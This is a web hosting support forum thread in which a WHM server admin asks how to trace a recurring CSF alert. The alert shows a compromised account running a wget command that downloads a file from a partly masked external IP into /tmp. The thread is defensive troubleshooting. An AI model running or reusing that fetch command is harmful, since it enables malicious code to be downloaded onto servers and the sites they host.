suspicious process from client website
Hi guys,
I have WHM and CSF installed and after configuring all settings and so on, there is only one notice I keep getting from CSF that's suspicious however I can't seem to find the culprit file and need some help please.
Time: Wed Oct 26 02:00:21 2016 +1100
Account: c150102a
Resource: Process Time
Exceeded: 3026245 > 1800 (seconds)
Executable: /usr/bin/bash
Command Line: sh -c cd /tmp ; /usr/bin/wget -t0 -c -
Executable: /usr/bin/bash Command Line: sh -c cd /tmp ; /usr/bin/wget -t0 -c http://176.119.x.xx:82/338/d/sess_3306573f35a450867b3c55f039474766 1> /dev/null 2> /dev/null && echo OK
As per the above alert, Your user c150102a was running command through SSH. You can remove that account from your server also please check /tmp directory and remove all unwanted file. If you are not sure about that then please contact to your system admin.0 -
As per the above alert, Your user c150102a was running command through SSH. You can remove that account from your server also please check /tmp directory and remove all unwanted file. If you are not sure about that then please contact to your system admin.
I am the system admin. I run the WHM server myself to host client websites. I'm sorry but I do not believe removing the c150102a account is a solution. The account hosts a website for a customer of mine and I cannot simply remove it. I would like to learn how to properly diagnose which file is running the command so I can resolve the issue and know how to deal with it in case I run in to something like this again.0 -
I would like to learn
You might want to google that filename, syslib.php for starters.0 -
Well I found the syslib.php file and removed it. I also did a search for any eval(base64_decode(...)) scripts but didn't find any. However, I am still receiving the CSF alerts for something calling a command to that Ukraine IP. Any other suggestions? 0 -
Have you checked the account for existing cron jobs? Cron Jobs - Documentation - cPanel Documentation That account shouldn't have access to SSH. It's been compromised and should be removed from the server and a backup from before this came up, restored in it's place. Without more knowledge of the server and your security, it's hard to say if the entire server has been compromised or not. You really should hire someone for assistance with this if you're unsure of your path forward here. This thread is two days old. Your server's been running a compromised site for at least two days too long. 0 -
I double checked. There are no existing cron jobs for any of the users. And this site has been live for months, yet there are no performance issues and nothing else suspicious going on. No other accounts are reporting any bad activities or scripts. In fact, CSF does not report anything else at all apart from that one alert over and over. I have run numerous scanners on the account itself internall and externally and a several WordPress plugin scanners and none of them have picked up on anything at all. If all else fails and I can't find the culprit, I will remove the account and rebuild the site. However, I am still keen to know what could be causing this... 0 -
Hi guys, so I went through all the accounts I had (47 in total) and found only 3 accounts with Shell access. None of these accounts were the same as the one mentioned above that was giving warnings. However, after fixing this and removing Shell access for these 3 accounts and restarting the server, the warnings have stopped. Not sure what stopped it or what was causing it still, but everything seems fine now and no more security alerts. Also a system wide scan was clean, so I believe the server is fine and there are no more threats or compromised sites. 0 -
Hi Are you sure you have mounted /tmp and /dev/shm as noexec and nosuid ? If not please do it asap and remount both partitions. Surely the account mentioned is upto some sort of hack and you need to interospect the account in a detailed manner. Did you checked and scanned the account in question ? Also look for the recent files modified for that account say last 90 days . and see if you are getting any clue. Also check the POST requests in the access logs and see if you are seeing any suspicious entries 0
Please sign in to leave a comment.
Comments
8 comments